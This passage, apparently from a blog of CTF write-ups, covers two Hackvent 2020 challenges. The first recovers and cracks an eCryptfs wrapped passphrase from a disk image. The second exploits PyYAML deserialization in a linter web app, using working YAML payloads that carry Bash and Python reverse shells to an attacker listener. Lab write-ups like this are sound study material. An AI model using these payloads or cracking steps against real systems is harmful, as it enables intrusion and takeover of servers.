If Santa deleted this file, but then took an image immediately after, there’s a good chance the bits are still on disk / in the image. I can check by using grep against the raw image file. I converted it to one long line of hex, and then looked for the pattern above:

# xxd -p 9154cb91-e72e-498f-95de-ac8335f71584.img | tr -d '\n' | grep -obP "3a02.{16}([3-7].){16}.{64}"

That pattern is looking for the signaute, then any eight bytes (16 hex characters), then sixteen bytes where the first hex char is between three and seven (roughly ASCII printable), then 32 more bytes. It finds one hit!

xxd will convert this back to raw binary:

# echo "3a02a723b12f66bcfeaa30353131313962306261636530616236dbb8dd00478fa189aec3cbe52294f4cad157fe2d78656774611f321b99306fc7" | xxd -r -p > wrapped-passphrase

Converting to hex and grep was kind of slow. A much faster way to do this would be to use binwalk to identify the offset:

# binwalk -R "\x3a\x02" 9154cb91-e72e-498f-95de-ac8335f71584.img 

7527715       0x72DD23        Raw signature (\x3a\x02)
96468992      0x5C00000       Raw signature (\x3a\x02)

Then dd can pull out 58 bytes:

# dd if=9154cb91-e72e-498f-95de-ac8335f71584.img of=wrapped-passphrase.tmp bs=1 count=58 skip=96468992
58+0 records in
58+0 records out
58 bytes copied, 0.0263151 s, 2.2 kB/s
# md5sum wrapped-passphrase*
f0398a8a4e4864892316d2d38b1de8e4  wrapped-passphrase.tmp
f0398a8a4e4864892316d2d38b1de8e4  wrapped-passphrase

Crack Passphrase

john has a utility to take this file and create a hash,

# /usr/share/john/ wrapped-passphrase > wrapped-passphrase.hash

Typically CTFs rely on rockyou for a password list, but there are hints in the prompt about the password. First, it contains santa. Second, the phrase “real human”. Googling for “real human password”, the first result is word lists from CrackStation:


I downloaded the crackstation-human-only.txt.gz, decompressed it, and used grep to get only words with santa in them, returning almost 14-thousand words:

# grep -i santa crackstation-human-only.txt  > santa_words
# wc -l santa_words 
13852 santa_words

Running the hash through hashcat with this wordlist break the hash pretty quickly:

# hashcat -m 12200 wrapped-passphrase.hash santa_words --user

Recover Filesystem

There’s a couple ways to go about this. Without changing the mounted image (or if mounted read only), the encryption key can be recovered from the wrapped-passphrase file:

# ecryptfs-unwrap-passphrase ~/hackvent2020/day18/wrapped-passphrase think-santa-lives-at-north-pole

With the encryption key, the data can be recovered by entering that key when prompted:

# ecryptfs-recover-private .Private/
INFO: Found [.Private/].
Try to recover this directory? [Y/n]: 
INFO: Could not find your wrapped passphrase file.
INFO: To recover this directory, you MUST have your original MOUNT passphrase.
INFO: When you first setup your encrypted private directory, you were told to record
INFO: your MOUNT passphrase.
INFO: It should be 32 characters long, consisting of [0-9] and [a-f].

Enter your MOUNT passphrase: 
INFO: Success!  Private data mounted at [/tmp/ecryptfs.UADWk0Lh].

Going to that directory, there’s the flag:

# cd /tmp/ecryptfs.UADWk0Lh/
# cat flag.txt 

Flag: HV20{a_b4ckup_of_1mp0rt4nt_f1l35_15_3553nt14l}

Alternatively, I could just copy the wrapped-passphrase file into the config directory and run ecryptfs-recover-private and it will find it, and prompt for the passphrase, and then mount the recovered system just like above. I could also use ecryptfs-insert-wrapped-passphrase-into-keyring before ecryptfs-recover-private to get the same result.



hv20-ball19 HV20.19 Docker Linter Service
Categories: web securityWEB SECURITY
Level: hard
Author: The Compiler

Docker Linter is a useful web application ensuring that your Docker-related files follow best practices. Unfortunately, there’s a security issue in there…

There’s a link in the resources to spin up instances of the website, as well as VPN instructions to position myself to get a reverse shell.



The website is a linting service for Docker related files:


As the menu says, it can handle Dockerfiles, Docker compose files, and .env files, and each of those have links to pages where I can either provide a file or paste content into a field and submit. For example, for Dockerfile:


Submitting on these pages, each has different sections of output that come back, for example from the Docker compose linter:


Across the three pages there are more (many of which I could locate open source links for):

There’s a lot of stuff here, and lot of attack surface area, as each step is calling other programs.

It’s also worth noting that the response headers show that the server is running Python:

HTTP/1.1 200 OK
Content-Length: 3376
Content-Type: text/html; charset=utf-8
Date: Sat, 19 Dec 2020 02:31:15 GMT
Server: Werkzeug/1.0.1 Python/3.8.2
Vary: Cookie
Connection: close

I tried a bunch of things that didn’t work, like looking for command injections or server-side javascript injection into dockerlint.js.


Python’s main YAML handling library, PyYAML, has had issues with deserialization attacks, and has since deprecated the yaml.load function because it’s unsafe. So seeing a Python webserver that is loading YAML data, it’s worth trying to try some injections here (technically it’s a deserialization vulnerability).

I submitted the example payload from the site above as the docker-compose.yml file:

!!python/object/new:os.system [echo EXPLOIT!]

The basic syntax check broke, in a way that it’s trying to create a Python instance as I’m asking it to:


This issue on the PyYaml GitHub page talks about the library still being vulnerable to attack, and gives some example payloads.

On the second one, I changed “RCE_HERE” to print('0xdf'):


On submitting that, the basic linter found no issues:


To see if it was actually running my code, I changed print to ppp (a non-existent function), and on submitting:


This is a really good sign that the submitted code is running.


I’ll update this payload with a one-liner reverse shell, initially using os.system() to run a Bash reverse shell:

  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "import os; os.system('bash -c \"bash -i >& /dev/tcp/ 0>&1\"')"

With nc started and listening on 443, I’ll submit that, and I get a shell:

root@kali# nc -lnvp 443
Ncat: Version 7.80 ( )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
bash: cannot set terminal process group (297): Not a tty
bash: no job control in this shell
bash: /root/.bashrc: Permission denied

The flag is sitting in the same directory:

bash-5.0$ cat flag.txt

Flag: HV20{pyy4ml-full-l04d-15-1n53cur3-4nd-b0rk3d}

A Python reverse shell works too (I just have to look it up every time, unlike the Bash one which I’ve memorized):

  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'